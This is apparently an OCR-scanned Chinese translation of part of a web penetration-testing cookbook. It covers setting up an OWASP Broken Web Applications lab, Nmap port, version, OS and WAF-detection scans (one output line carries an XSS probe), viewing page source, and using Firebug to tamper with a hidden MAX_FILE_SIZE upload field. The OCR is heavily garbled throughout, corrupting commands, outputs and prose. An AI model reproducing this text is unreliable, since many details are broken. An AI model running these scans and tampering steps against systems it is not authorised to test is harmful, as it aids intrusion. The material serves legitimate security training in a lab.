iK | {97.3 KiB) TX bytes:99649 (8 


vboxnatà Link encap:Ethernet HWaddr 0a:00:27:00:00:00 
inet addr:192.168.56.1 Bcast:192.168.56,255 
inete aggdr: feg: -:800:F7/7/TTf:fe00:0/64 Sci ope "| ink 
UP BROADCAST RUNNI NG MULTICAST MMTU:1588 Metric:1 
RA packets:0 errors:B dropped:g overruns:a frame:ü 
TX packets:153 errors:8 dropped: 
col lisions: txqueuelen:l10080 


m ^ exam m [uj | gm gm gm os [aj 
'l'i-Ius Tai ke 





我 们 可 以 看 到 我 们 拥有 叫做 vboxneto 的 网 络 适 配器 ， 并 且 它 的 IP 地 址 为 
192.168.56.1。 取决 于 你 所 使 用 的 配置 ， 这 可 能 有 所 不 同 


登录 vulnerable vm 并 检查 适配器 ethe 的 IP 地址 。 


ifconfig 


现在 ， 让 我 们 访问 我 们 的 客户 端 主机 IE8 - Win7 。 打 开 命 令 行 提 示 符 并 输入 : 


ipconfig 


现在 ， 我 们 拥有 了 三 à. L8jg IP 地 址 。 


o 192.168.56.1 : fà ŁU 
o 192.168.56.102 : vulnerable vm 
o 192.168.56.103 : IE8 - Win? 
为 了 测试 通信 ， 我 们 打算 从 御 主 机 中 ping 两 个 虚拟 机 。 


ping -c 4 192.168.56.102 
ping -c 4 192.168.56.103 


:=# ping -c J A96. .168.56.1 2 
PING 192.168.56.102 | | (84) bytes of data. 
92 LBR 5.102: ttl=64 time=0.369 
ttl=64 time=0.243 
"pe itm. reg E ttl264 emaan 252 
Lemp ttl=64 timņme=0 . 747 


--- 192.168.56.102 ping statistics : 
d packets transmitted, 4 received, 0% packet loss, time 2999ms 


rtt min/av "gi max/mdev = f irs 2771 69/0 .8056 ms 
ping -c c 103 
25.103 [192 .168 183) 56(84) bytes of data. 
| icmp seg-l Des stination Ho: st Unreachable 
e Destination Ho: JRCRRCHBIER 
able 


x Un renchabie 


192.168.56.1803 ping statist 
4 packets transmitted, 0 received, «4 errors, 100% packet loss, time 3015ms 





ping 会 发 送 ICMP 请 求 给 目标 ， 并 等 待 回复 。 这 在 测试 网 络 上 两 个 节点 之 间 是 否 可 以 通 
信 的 时 候 非常 有 用 。 


19.， 我 们 对 两 个 庶 拟 机 做 相同 操作 ， 来 检 车 到 服务 矣 和 到 另 一 全 庶 拟 机 的 通信 和 是否 正 第 。 


20. IE8 - Win7 虚拟 机 可 能 不 响应 ping， 这 常 的 ， 因 为 Win7 的 配置 默认 不 响应 ping。 
为 了 检查 连接 性 ， 我 们 可 以 从 Kali pun arping ? 


arping -c 4 192.168.56.103 


工作 原理 


仅 有 主机 的 网 络 是 虚拟 网 络 ， 它 的 行为 像 LAN， 但 是 它 仅 仅 能 够 访问 宿主 机 ， 所 运行 的 虚拟 
机 不 会 其 圳 给 外 部 系统 。 这 种 网 络 也 为 宿主 机 提供 了 虚拟 适配器 来 和 虚拟 机 通信 ， 就 像 它 们 
在 相同 网 段 那 样 。 


使 用 我 们 刚刚 完成 的 配置 ， 我 们 就 能 够 在 客户 端 和 服务 器 之 间 通 信 ， 二 者 都 可 以 跟 Kali 主 机 
通信 ，Kali 会 作为 攻击 主机 。 


gu 


1.8 了 解 漏洞 VM 上 的 Web 应 用 


OWASP BWA 包含 许多 Web 应 用 ， 其 内 部 含有 第 见 攻击 的 漏洞 。 它 们 中 的 一 些 专注 于 一 些 
特定 技巧 的 实验 ， 而 其 它 尝 试 复制 碰巧 含有 漏洞 的 ， 鼻 实 世 界 的 应 用 。 


这 个 秘籍 中 ， 我 们 会 探索 vulnerable vm， 并 了 解 一 些 其 中 包含 的 应 用 。 


准备 


第 一 章 配置 Kali Linux 


我 们 需要 局 


动 我 们 的 vulnerable vm， 并 正确 配置 它 的 网 这 本 书 中 ， 我 们 会 使 用 


192.168.56.102 作为 它 的 IP 地 址 。 


TRE SV 


FR 


1. vulnerable vm È 35/6 » 4r H Kali 主机 的 Web 浏览 器 并 访问 http://192.168.56.102 。 你 
会 看 到 服务 器 pip AAR o 




















Ei einn akin OWASP Broken Web Applications - OWASP Mantra = _ 0 

(OM owaspbwa OWASP Broken .. | — F 
5S7 xcxcNISS Gog Bd & NIB qs c CU k 
* 

eh 

4 

~ owaspbwa 

i 1 F 

a aT OWASP Broken Web Applications Project 

ase 

T 

T] This ls Ehe VM Tor the Open it SP) Broken Web Applications project. IE 

contains many, very vulnerable weh applications, Which are listed "below. More information about this praject 

E can be found in the project Usar Guide and Home Page. 

" For details abaut the known vulnerabilities in these applications, see htpfsourcetorge.neVappsrtrac 

C  J[owaspbwalreport/l. 

加 

e 











TRAINING APPLICATIONS 








Qo [| r ñ SP B ri c k & 
Onamn Vulnarahle Wah Annlication hast 


2. 让 我 们 访问 Damn Vulnerable web Application ° 


3. 使 用 admin 作为 用 户 名 ， admin 作为 密码 。 我 们 可 以 看 到 左边 的 菜单 : 菜单 包含 我 们 可 


以 ARES PUR RR 的 链接 : 爆破 、 命 令 执 行 、SQL 注入 ， 以 及 其 它 。 同 样 ，DVWA 3 


这 部 


3 
内 


分 是 我 们 用 于 配置 漏洞 输入 的 安全 (或 复杂 性 ) 等 级 的 地 方 。 
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第 一 草 配置 Kali Linux 


Damn Vulnerable Web App (DVWA) v1.8 :: Welcome = OWASP Mantra EREN 
= Dame Vulnerable Web App m 














€- m ||]192.168.55.102/dvwahndex. php e 
* 
* 
i Welcome to Damn Vulnerable Web App! 
3 Ensstr uicti ons | Damn Vulnarabie Wob App (DVAMA) is a PHPÓMySOL web application thak is damm vulmerania. its main goals 
i -一 一 一 = are to be an ald Tor security professionals te test their skills and tools im a legal environment, help web developers 
p Sep better underztand ihe processes of £ecurmmg wab applications and aid teschersistudenta tà tp hule wh weh 
à | 9 Hp 
Sal application sacurnty m a class racm eninsnmiant 
Lil 
x Brute Force | WARNING! 
| Command Execution — Damn Vulnerabla Vab App is damn wulnerable! Do not upload it to your hosing prowidar's public nomi Tolifer or 
& , y J 
: ESRF | ary inbemet [acing web samar as | Will be compromised Ve recommend downloading and mstalling AMP P 
o —À anta a local marbana insida your LAM whichis usad solely Tar testing 
: insecure CAPTCHA — | Disclai 
z entere ned ata cim ha la sclaimer 
Gi File Inclusion | 
E SQL Injection | We da nat take responsibility fór ihe way in which any ane uses this anplicabion. We have made the purpeses o 
- ——— - Whe application cear and rt should rel be used rmalciousty. ve nave ven wariings and taken measures tà 
ui SQL injection (Biind) | prevent users iem installing DMA on to We web servers. IT your web samer jé compromised va an installabion of 
€ dE | DAMNA Rs nal eur respansiiliesy IL is the responsibility al the personis who upioaded and mstalled it. 
Upload RE 
x pee cid | General Instructions 
X55 stored | The help butzon aliows you to view hiEs/tips for each wlnerabiliy and Tor each secuniby level on thelr reapecihe 
— i page. 
PHP Info | 
rau hava Inaged in as admin 
About | 


EN l 


4， 登 出 并 返回 服务 器 的 主页 。 





5， 现 在 我 们 点 击 OWASP WebGoat.NET 9 这 是 个 NET 应用， 其 中 我 们 可 以 实验 文件 和 代码 注 
入 攻击 ， 跨 站 脚本 ， 和 加 密 汤 洞 。 它 也 含有 WebGoat Coins Customer Portal ， 它 模拟 了 
商店 应 用 ， 并 可 以 用 于 实验 漏洞 利用 和 漏洞 识别 。 


| sed 
OWASP Mantra (m | EF a- 








You appear to be connacted to a valid MySql provider. H you want to recontigure or rebuild the database, click on tha 
injection Attacks buttar below 


生计 lid 


Authtenbcakian aues 


(M nttp/192:16.. t webgoat.net/ * © 
| E = E- /1192168.56.102/webgoat.net/ Doogee EB GUSEN NEDA GO C f * 
| 起 Walenme to WabGoat NET [s 
| Ji = | Id Database | Login 
Fi i 
d WEBGOAT NEI 
-—- 3 : a 

lI 国志 

j^ Getting Started with A Gating Started with Véebipat NET — Welcome 

i» — websGost HET 
| 99 iisi 

Kolege ' i A Lessin isbn 

lg WELCOME TO WEBGOAT.NET 
| Web Proxy Test 

tè 
| t Wentoat HET Is a purposetulhez insecure web application - use it tg laam and urderstand abcut bad coding practicas in 
| 看 "ing Database HET. Each hilodula an the jot sida illustrates a common wen vulnerability. Visnioat HET was designed to be usad in Ime 
| 已 eb a Coins Customer raining and/ar e-Ieamang BM. 

Portal 

& 


Testing and Debugging 


Encrypbon 
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7.， 男 一 个 包含 在 虚拟 机 中 的 有 趣 应 用 是 Bodgelt。 它 是 基于 JSP 的 在 线 商店 的 最 小 化 版 
本 。 它 拥有 我 们 可 以 加 入 购物 车 的 商品 列表 ， 带 有 高 级 选项 的 搜索 页 面 ， 为 新 用 户 准 备 
的 注册 表单 ， 以 及 登录 表单 。 这 里 没有 到 漏洞 的 直接 引用 ， 反 之 ， 我 们 需要 自己 找 它 
们 。 


The Bodge Stare - OWASP Mantra 


.e 





a awaspbwa OWASP Broken... = | $ Poruggia 17 * $ The Bedqgeit Stora 
132,168.55 102/bhndger 图 Sim fi 
* Em 
5 The Bodgelt Store 
t 
ia Fie bodge it. so yau dont have ba! Guest user 
Li : : 
Home About Us Contaci Us Legin Your Basket Search 

i : : 

Dopdahs Our Best Deals! 
è Gizmos 
w Thingamajigs Product Type Price 

T -— 
AE "ona Gomplex Widget Widgets $3119 

liba 

y ie Jua Ms TGJ GGG lhingamajigs $2 B0 

"has TEDGSREPIS T ; ! T 
t "m TG JA Thinagarmajigs S0.H0 

MWicdgels 二 : | | 
加 Complex Widget Wickgete $3 
p Gormplax Widget Widgets i: 
ia Tipalrmytongug Whatchamacallits $3.74 

Whatroet Wnatchamacailits $2 B8 

wy Tipofmytengua Vrinatenamacallis TA T4 
& Tupafmytengua Whatchamncallits $374 
z din a dae dca dahk L'podahs L^ 


8， 我 们 在 一 个 秘籍 中 不 能 浏览 所 有 应 用 ， 但 是 我 们 会 在 这 本 书 中 使 用 它们 。 


工作 原理 


主页 上 的 应 用 组 织 为 六 组 : 


e 训练 应 用 : 这 些 应 用 分 为 几 部 分 ， 专 注 于 实验 特定 的 漏洞 或 攻击 技巧 。 他 它们 中 的 一 些 
包含 教程 、 解 释 或 其 他 形式 的 指导 。 


e 监 实 的 ， 内 部 含有 汤 洞 的 应 用 : 这 些 应 用 的 行为 就 像 丨 实 世 界 的 应 用 ( 商店】 博客 或 社 
交 网 络 ) 一 样 ， 但 是 开发 者 出 于 训练 目的 在 内 部 设置 了 漏洞 。 


e ZEME (GRIS) 版 本 : 上 中 是 应 用 的 下 版本， 例如 WordPress 和 Joomla 含有 已 知 


EE 

9 可 利用 的 漏洞 。 这 对 于 测试 我 们 的 漏洞 识别 技巧 非常 实用 

。 用 于 测试 工具 的 应 用 : 这 个 组 中 的 应 用 可 以 用 做 自动 化 漏洞 扫描 器 的 基准 线 测试 。 
e 演示 页 面 /小 应 用 : 这 些小 应 用 拥有 一 个 或 一 些 漏洞 ， 仅 仅 出 于 演示 目的 。 


e OWASP 演示 应 用 : OWASP AppSensor 是 个 有 趣 的 应 用 ， 它 模拟 了 社交 网 络 并 含有 一 
些 漏 洞 。 但 是 他 会 记录 任何 攻击 的 意图 ， 这 在 尝试 学 习 的 时 候 很 有 帮助 。 例 如 ， 如 何 绕 
过 一 些 安全 设备 ， 例 如 网 络 应 用 防火 墙 。 


aah f 


第 二 草 侦查 


作者 : Gilberto Najera-Gutierrez 
译 者 : 飞龙 


Wu : CC BY-NC-SA 4.0 


AJ 

简介 

在 每 个 渗透 测试 中 ， 无 论 对 于 网 络 还 是 Web 应 用 ， 都 有 一 套 流 程 。 其 中 需要 完成 一 些 步 又， 
来 增加 我 们 发 现 和 利用 每 个 影响 我 们 目标 的 可 能 的 漏洞 的 机 会 。 例 如 


e 侦查 


e 利用 
e 维持 访问 
e 清理 踪迹 


d a a 
所 有 可 能 组 件 。 它 们 也 会 收集 关于 公司 、 网 络 和 雇员 的 最 大 信息 。 在 我 们 的 例子 中 ， 对 于 
Web 应 用 渗透 测试 ， 这 个 阶段 主要 关于 了 解 应 用 、 数 据 库 、 用 户 \、 服 务 器 以 及 应 用 和 我 们 之 
间 的 关系 。 


侦查 是 每 个 渗透 测试 中 的 必要 阶段 。 我 们 得 到 了 的 目标 信息 越 多 ， 发 现 和 利用 漏洞 时 ， 我 们 
拥有 的 选项 就 越 多 。 


2.1 使 用 Nmap 扫描 和 识别 服务 


Nmap 可 能 是 世界 上 最 广泛 使 用 的 端口 扫描 器 。 他 可 以 用 于 识别 活动 主机 、 扫 描 TCP 和 UDP 
开放 端口 ， 检 测 防火 墙 ， 获 得 运行 在 远程 主机 上 的 服务 版 本 ， 甚 至 是 ， 可 以 使 用 脚本 来 发 现 
和 利用 漏洞 。 


这 个 秘籍 中 ， 我 们 会 使 用 Nmap a "à 了 在 目标 应 用 上 的 所 有 服务 。 出 于 教学 目的 ， 我 们 
会 多 次 调用 Nmap 来 实现 它 ， 但 是 以 通过 单个 命令 来 完成 。 
准备 


我 们 只 需要 将 vulnerable vm 和 运行 起 来 。 


TTE E 
首先 ， 我 们 打算 看 看 服务 器 是 否 响应 ping， 或 者 服务 器 是 否 打 开 : 


nmap -Sn 192.168.56.102 


:=# nmap -sn 192.168.56.102 


starting Nmap a | http://nmap.org ) at 2015-06-09 21:15 CDT 
Nmap scan report for 192 

Host is up (0.000245 Latency 

MAC Address: 68:00 :27 :3F :C5 C4 [Cadmus Compute 

Mmap done: 1 IP address {1 host up) scanned in G8 





2. 现在 我 们 直到 它 打 开 了 让 我 们 看 看 打开 了 哪些 


nmap 192.168.56.102 


-# nmap 192.168.536.102 


| 21 


starting Nmap 6.47 { http:/ nnmap .org at 2015-06-08 , 
Nmap scan report for 192.158.56.102 
Host is up (8.00041s latency). 
Mot shown: 991 closed ports 
STATE SERVICE 
öpen ssh 
open http 
open netbios-ss 
open  imap 
open nttps 
open microsoft -ds 
"tep open comp x: link 
rep open http-proxy 
-apan Ns kKice- lcecap 
à "m t :80:2/:3F:C5:L4 (Cadmus Computer Systems] 





Nmap done: 1 IP address (1 host up) scanned in 0.30 : 


3. 现在， 我 们 要 让 Nmap 向 服务 器 询问 正在 运行 的 服务 的 版 本 ， 并 且 基于 它 猜测 操作 系 
2 


nmap -sV -O 192.168.56.10 


4. 我 们 可 以 看 到 ， 我 们 的 vulnerable vm 使 用 Linux 2.6 内 核 ， 并 带 有 Apache 2.2.14 Web 
服务 器 ，PHP 5.3.2， 以 及 其 它 。 


工作 原理 


pedeo ioin MED RAPAIRE tie 
否 有 响应 。 如 果 有 的 话 ， 这 意味 着 端口 是 打开 的 ， 因 此 ， 端 口上 运行 着 服务 。 


在 第 一 个 名 中 ， 使 用 -sn 参数 ， 我 们 让 Nmap 只 检查 是 否 服务 器 响应 ICMP 请 求 (或 
ping) 。 我 们 的 服务 器 响应 了 ， 所 以 它 是 活动 的 。 


第 二 个 命令 是 调用 Nmap 的 最 简 方 式 ， 它 只 指定 目标 IP。 所 做 的 事情 是 先 ping 服务 器 ， 如 果 
它 响应 了 ，Nmap 会 向 1000 个 TCP 端口 列表 发 送 探 和 针 ， 来 观 宗 哪 个 端口 响应 ， 之 后 报告 响 


第 三 个 命令 向 第 二 个 添加 了 如 下 两 个 任务 : 


o -sv 请 求 每 个 被 发 现 的 开放 端口 的 标识 〈 头 部 或 者 自我 识别 ) ， 这 是 它 用 作 版 本 的 东 
西 。 


e -0 告诉 Nmap， 尝 试 猜测 运行 在 目标 上 的 操作 系统 。 使 用 开放 端口 和 版 本 收集 的 信息 。 


e sT : 通常， 在 root 用 户 下 运行 Nmap 时， 它 使 用 SYN 扫描 类 型 。 使 用 这 个 参数 ， 我 
们 就 强制 让 扫描 器 执行 元 全 连接 的 扫描 。 它 更 慢 ， 并 且 会 在 服务 器 的 日 志 中 留 下 记录 ， 
但 是 它 不 太 可 能 被 入 侵 检 测 系 统 检测 到 。 


e -pn : 如果 我 们 已 经 知道 了 主机 是 活动 的 或 者 不 响应 ping， 我 们 可 以 使 用 这 个 参数 告诉 
Nmap 跳 过 ping 测试 ， 并 扫描 所 有 指定 目标 ， 假 设 它们 是 开启 的 。 


。 v : 这 会 开启 详细 模式 。Nmap 会 展示 更 多 关于 它 所 做 事情 和 得 到 回复 的 信息 。 参 数 可 
以 在 相 同 命 令 中 重复 多 次 次 : 次 数 越 乡 ， 就 越 详 细 (也 就 是 说 ， -vv AR -v -v -v V ) 8 


e -p N1,N2,Nn : 如 果 我 们 打算 测试 特定 端口 或 一 些 非 标准 端口 ， 我 们 可 能 想 这 个 参 
数 。N1 到 Nn 是 打算 让 Nmap 扫描 的 端口 。 例 如 ， 要 扫描 端口 21，80 到 90， 和 137 ° 
参数 应 为 : -p 21,80-90,137 ° 


e  --script-script name : Nmap 包含 很 多 实用 的 漏洞 检测 、 扫 描 和 识别 、 登 录 测 试 、 命 令 
执行 、 用 户 枚 举 以 及 其 它 脚本 。 使 用 这 个 参数 来 告诉 Nmap 在 目标 的 开放 端口 上 运行 脚 
本 。 你 可 能 打算 查看 一 些 Nmap 脚本 ， 它 们 在 : https://nmap.org/nsedoc/scripts/ ° 


7 IL 


虽然 它 最 为 流行 ， 但 是 Nmap 不 是 唯一 可 用 的 端口 扫描 器 ， 并 且 ， 取 决 于 不 同 的 喜好 ， 可 能 
也 不 是 最 好 的 。 下 面 是 Kali 中 包含 的 一 些 其 它 的 替代 品 : 


e unicornscan 
e hping3 

e masscan 

e amap 


e Metasploit scanning module 


2.2 识别 Web & 7f] Ez X 38 


Web 应 用 防火 墙 (WAF) 是 一 个 设备 或 软件 ， 它 可 以 检查 发 送 到 Web 服务 器 的 封包 ， 以 便 
识别 和 阻止 可 能 的 恶意 封包 ， 它 们 通常 基于 签名 或 正则 表达 式 。 


如 果 未 检测 到 的 WAF 阻止 了 我 们 的 请 求 或 者 封禁 了 我 们 的 I|P， 我 们 渗透 测试 中 就 要 处 理 很 
多 的 奢 烦 。 在 执行 渗透 测试 的 时 候 ， 人 侦查 层 面 必须 包含 检测 和 是 被 WAF， 入 侵 检 测 系 统 
(IDS) ， 或 者 入 侵 阻 止 系统 (IPS) 。 这 是 必须 的 ， 为 了 采取 必要 的 手段 来 防止 被 阻拦 或 禁 
i-o 


这 个 秘籍 中 ， 我 们 会 使 用 不 同 的 方法 ， 并 配合 Kali Linux 中 的 工具 ， 阿 里 为 检测 和 识别 目标 和 
我 们 之 间 的 Web 应 用 防火 墙 的 存在 。 


操作 步骤 
1. Nmap 包含 了 一 些 脚 本 ， 用 于 测试 WAF 的 存在 。 让 我 们 在 vulnerable-vm 上 尝试 它们 : 


nmap -p 80,443 --script=http-waf-detect 192.168.56.102 


:=# nmap -p 80,443 --script=ħttp-waf-detect 192.16 


starting Nmap 6.47 ( http://nmap.org ] at 2015-06 
Nmap scan report for 192 16 B. 26.102 
Host is up (80.000315 latency). 
STATE SERVICE 
open nttp 
öpen mit a 
C Nddress: 08:00:27:3F:C5:C4 [Cadmus Computer Systems) 





Nmap done: 1 IP address (1 host up) scanned in 8.42 s 


好 的 ， 没 检测 到 任何 WAF。 所 以 这 个 服务 器 上 没有 WAF e 


2. 现在 ， 让 我 们 在 丫 正 拥有 防火 墙 的 服务 器 上 党 试 相同 命令 。 这 里 ， 我 们 会 使 
用 example.com ， yun 的 服务 蜂 上 党 试 它 。 


nmap -p 80,443 --script-http-waf-detect www.example.com 


:=# nmap -p 80,443 --script-http-waf-detect www.example.com 


mI 


Starting Nmap 6.47 ( http://nmap.org ) at 2815- -86 13 11:43 CDT 
Nmap scan report for www.example.com | 
Host is up (0.0335 latency). 
rDNS record for i. 66.252: 
PORT STATE ZU RE 
/tcp uem AIR 
"http: -WA - IDS/IPS/WAF detected: 
Sid axa pta Can: go) ?pdylO4d3-z«scripts»alert(documan 
j143/tcp open https 
http-waf-detect: IDS/IPS/WAF deteci 
 wWww.example.com:443/?p4ylG4d3-«escripte»alert(document .co 


Nmap done: 1 IP 55 (1 host up) scanned in 





Imperva 是 Web 应 用 防火 墙 市 场 的 主流 品牌 之 一 。 就 像 我 们 这 里 看 到 的 ， 有 一 个 保护 网 
站 的 设备 。 


这 里 是 另 一 个 Nmap 脚本 ， 可 以 帮助 我 们 识别 所 使 用 的 设备 ， 并 更 加 精确 。 脚 本 在 下 
面 : 


nmap -p 80,443 --script-http-waf-fingerprint www.example.com 


-&cript-http-waf-fingerprint www.e 


star ting Nmap 17 [| http://nmap.arg ) 
Nmap scan VOD FE: for www.example.com | 
Host is up (0.0335 Latenc v. 
5 record far IER E HS 1-5" example.com 


PORT SIATE SERVICE 
i|B/tcp open http 
http-waf-fingerprint: 
Detected WAF 
E Incapsula WAF 
4áj3/tcp open https 





Nmap done: 1 IP address il] host up) scanned in 0.B/ seconds 


另 一 个 Kali Linux B iLE T VA A 97 3x12 Je zt 3X WAF > €A wafoeof 。 假 
iX www.example.com Æ 5c WAF 保护 的 站 点 : 


wafwoof www.example.com 


'=# wafwOOT www.exi 


WAFWOGF = Web Application Firewall De 


By Sandro Gauci &6 Wendel G. Henrique 


Checking http://www.example.com 

Generic Detection results: 

The site http://www.example.com seems to be behind a WAF 
Reason: Blocking is being done at connection/packet Level. 
Number of requests: 13 





工作 原理 


WAF 检测 的 原理 是 通过 发 送 特 定 请 求 到 服务 器 ， 之 后 iin o 例如， 
在 http-waf-detect 的 例子 中 ， 它 发 送 了 一 些 基 本 的 恶意 走 ， 并 对 比 响应 ， 同 时 查找 封包 被 
阻拦 、 拒 绝 或 检测 到 的 标识 。 http-waf-fingerprint FUN ' 但 是 这 个 脚本 也 尝试 拦截 响应 ， 
并 根据 已 知 的 不 同 IDS 和 WAF 的 模式 对 其 分 类 。 watwoof 也 是 这 样 。 


2.3 SA TRAN 


查看 网 页 的 源 代 码 允 许 我 们 理解 一 些 程序 的 逻辑 ， 检 测 明 显 的 漏洞 ， 以 及 在 测试 时 有 所 参 
考 ， 因 为 我 们 能 够 在 测试 之 前 和 之 后 比较 代码 ， 并 且 使 用 比较 结果 来 修改 我 们 的 下 一 次 党 
试 。 


这 个 秘籍 中 ， 我 们 会 查看 应 用 的 源 代码 ， 并 从 中 得 出 一 些 结论 。 
准备 

为 这 个 秘籍 启动 vulnerable vm » 

IRAE JE 


1. 浏览 http://192.168.56.102 ° 
2. 选择 WackoPicko 应 用 。 


3. 右 击 页 面 并 选择 view Page Source. (AARE) 。 会 打开 带 有 页 面 源 代 码 的 新 窗口 : 


Source of: http://192.168.56.102/WackoPicko/ - OWASP Mantra 


File Edit View Help 
BUL inai s HUL dil. you can atso puy ine rignis Lu ine nigh qualliy eor 7> 
version of someone's pictures, WackoPicko is fun for the whole family. 


ep 


«h3sNew Here?«/h1i» 
«pe 


«há»«a href=" "Create an accounte/a»«/h4» 





«hd»«a href-" ^NackoPicko/users/sample.php?userid-l"»Check out a sample user!z/a»«/h4» 
mp 
v 
«h4»«a href-" /WackoPicko/calendar.php'»hat is going on today?«/a»«/h4» 
e / p» 
«n» 
«hd»Dr you can test to see if WackoPicka can handle a file:«c/h4» «br /» 
¿script> 
dacument.write('«farm enct 






ez" mir "form-data" action-" fWackaPicko/ LE' + 'check' + 
'.php" method="POST" >02 id ma- FILE SIZE" valuez" SEE ect this file: 
«input name="userfile" typez' "Hle" f» sr /»With this name: «input name="name" type="text" /» «br 
f «br /»«input type="submit" value="Send File" /»«br /» e/forn>'):; 

</script> 





ep» 
«diva 





«miv rlasss" column «nan-24 first last" dde*fnoter" > 


Line 65, Col 173 ris 


根据 源 代 码 ， ee i a ， 以 及 链接 的 去 向 。 同 时 ， 在 截 
图 中 可 以 看 到 ， 这 个 页 面 拥有 一 些 隐藏 的 输入 字段 。 选 中 的 是 MAX_FILE_SIZE ， 这 意味 
et 
改 了 这 个 值 ， 我 们 可 能 就 能 够 上 传 大 于 应 用 所 预期 的 文件 。 这 反映 了 一 个 重要 的 安全 问 


b o 


工作 原理 


网 页 的 源 代 码 在 发 现 漏 洞 和 分 析 应 用 对 所 提供 输入 的 响应 上 非常 有 用 。 它 也 提供 给 我 们 关于 
应 用 内 部 如 何 工 作 ， 以 及 它 是 否 使 用 了 任何 第 三 方 库 或 框架 的 信息 。 


一 些 应 用 也 包含 使 用 JS 或 任何 其 它 脚 本 语言 编写 的 输入 校 验 、 编 码 和 加 密 函 数 。 由 于 这 些 代 
码 在 浏览 蜂 中 执行 ， 我 们 能 够 通过 查看 页 —— 分 析 它 ， 一 旦 我 们 看 到 了 校 验 函数 ， 我 
们 就 可 以 研究 它 并 找到 任何 能 够 让 我 们 绕 过 它 或 修改 结果 的 安全 缺陷 


4.4 使 用 Firefox 分 析 和 修改 基本 行为 


Firebug 是 个 浏览 器 插件 ， 允 许 我 们 分 析 网 页 的 内 部 组 件 ， 例 如 表格 元 素 、 层 党 样 式 表 
(CSS) 类 、 框 架 以 及 其 它 。 它 也 有 展示 DOM 对 象 、 错 误 代 码 和 浏览 器 服务 器 之 间 的 请 求 
响应 通信 的 功能 。 


在 上 一 个 秘籍 中 ， 我 们 看 到 了 如 何 查看 网 页 的 HTML 源 代 码 以 及 发 现 影 藏 的 输入 字段 。 隐 藏 
的 字段 为 文件 最 大 大 小 设置 了 一 些 默 认 值 。 在 这 个 秘籍 中 ， 我 们 会 看 到 如 何 使 用 浏览 器 的 调 
试 扩展 ， 这 里 是 Firefox 或 者 OWASP-Mantra 上 的 Firebug 。 


准备 


R 3) vulnerable vm ;访问 http://192.168.56.102/WackoPicko ° 


操作 步骤 


1. Zr Check this file (检查 此 文件 ) ， 之 后 选择 Inspect Element with Firebug (使 用 
Firebug 查看 元 素 ) 。 


WackoPicko.com - OWASP Mantra 
/ 4 WackoPicko.com x 
€ > M- ||192.168.56.102/WackoPicka/ 


* 





— 
































L^] 


B hs. ha, hs. hē. 


t DOM 
















€uüSgS.^cz2tf6-Hes 


"input type-"hidden" value-"30000* name-*MAX FILE SIZE'» p, blackquote, 
Check this file: pre, s, abbr, 
<input typez"iile" namgez"useríile*s acronym, address, 
xbr code, del, dfn, 
With this name: | Em, ing, q: dl. 
ejinput typez"text" nanez'nare"s dt, dd, pl, ul, 
shra li, faieldzet, 
br» form. label. 


«input typea"submit" valuea"Send File" aeri prie 


uer [v] tfoot. thead. tr. 
2. 表单 的 第 一 个 输入 框 存在 type="hidden" 参数 ， 双 击 hidden ° 


3. 将 hidden AA text 之 后 按 下 回 车 键 。 


Google 图 NEED mL; G COM * 


htsl, body, div, screen.css (line 14) E 









zn 










名 





| » KR 2 | “| Console HTML* | Css Script DOM Net Cookies 


i Edit form < div.column < div.container < body < html 


gm «script» 
«form method="POST" actione"/WackoPicko 
fpiccheck.php" enctypes"multipart/form-data 
«input type="text" values"30000" namez"MAX FILE SIZE"» 
Check this file: 
«input type-"file" name-s"userfile"» 
«br» 





4. 现在 双击 参数 值 的 30000 。 


5. 将 他 改 成 500000 ° 
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S ad ò T| Console | HTML * | CSS. Script DOM Net Cookies 


¿3 | Edit input < form < div.column < div.container < body < html 
gm «script» 
z «form method="POST" actione"/WackoPicko 
/piccheck.php" enctype-"multipart/form-data"- 
«input type="text" values"500000" name-"MAX FILE SIZE"- 
Check this file: 
«input type-"file" names"userfile"- 
«br» 
With this name: 
«input type="text" name-"name" 
«br» 
ebrs 
«input type-"submit" value-"Send File" 
«br» 


cíftTuarms 


6，、 现 在， 我 们 看 到 了 页 面 上 的 新 文本 框 ， 值 为 500000。 我 们 刚刚 修改 了 文件 大 小 上 限 ， 并 
添加 了 个 表单 字段 来 修改 它 。 






k d 
- 


What is going on today? 


Or you can test to see if WackoPicko can handle a fila: 


500000 [Check this file: Browse... | 





With this name: | | 


| send File | 


Home | Admin | Contaci | Terms of Service 





工作 原理 


一 旦 页 面 被 浏览 器 收 到 ， 所 有 元 素 都 可 以 修改 ， 来 改变 浏览 器 解释 它 的 方式 。 如 果 页 面 被 重 
新 加 载 ， 服 务 器 所 生成 的 版 本 会 再 次 展示 。 


Firebug 允许 我 们 修改 几乎 每 个 页 面 在 浏览 器 中 显示 的 层面 。 所 以 ， 如 果 存 在 建立 在 客户 端的 
控制 人 逻辑， 我 们 可 以 使 用 工具 来 操作 它 。 
$2 
Firebug 不 仅仅 是 个 取消 输入 框 的 隐藏 或 修改 值 的 工具 ， 它 也 拥有 一 些 其它 的 实用 功能 : 
e Console 标签 页 展示 错误 ， 警 告 以 及 一 些 在 加 载 页 面 时 生成 的 其 它 消息 。 


e HTML 标签 页 是 我 们 刚刚 使 用 的 页 面 ， 它 以 层次 方式 展示 HTML， 所 以 允许 我 们 修改 它 的 


b. 
Ire, 


e css 标签 页 用 于 查看 和 修改 页 面 使 用 的 CSS 风格 。 


e Script 让 我 们 能 够 看 到 完整 的 HTML. 源 代 码 ， 设 置 会 打 断 页 面 加 载 的 断 点 ， 执 行 到 它们 
时 会 打 断 加 载 ， 以 及 检查 脚本 运行 时 的 变量 值 。 


e DoM 标签 页 向 我 们 展示 了 DOM (文档 对 象 模型 ) 对 象 ， 它 们 的 值 ， 以 及 层次 结构 。 


e Net 展示 了 发 送 务 器 的 请 求 和 它 的 响应 ， 它 们 的 类 型 、 尺 寸 、 响 应 时 间 ， 和 时 间 轴 
E agni FP 


e Cookies 包含 由 服务 器 设置 的 Cookie， 以 及 它们 的 值 和 参数 ， 就 像 它 的 名 字 那 样 。 


4.5 获取 和 修改 Cookie 


Cookie 是 由 服务 器 发 送 给 浏览 器 (客户 端 ) 的 小 型 信息 片段 ， 用 于 在 本 地 储存 一 些 信 息 
们 和 特定 用 户 相 关 。 在 现代 Web 应 用 中 ，Cookie 用 于 储存 用 户 特 定 的 数据 、 例 如 主题 闫 ^ 
配置 、 对 象 排 列 偏 好 、 上 一 个 活动 、 以 及 (对 我 们 更 重要 ) 会 话 标识 符 。 


这 个 秘籍 中 ， 我 们 会 使 用 浏览 器 的 工具 来 查看 Cookie 的 值 ， 它 们 如 何 储存 以 及 如 何 修 改 它 
们 。 
准备 


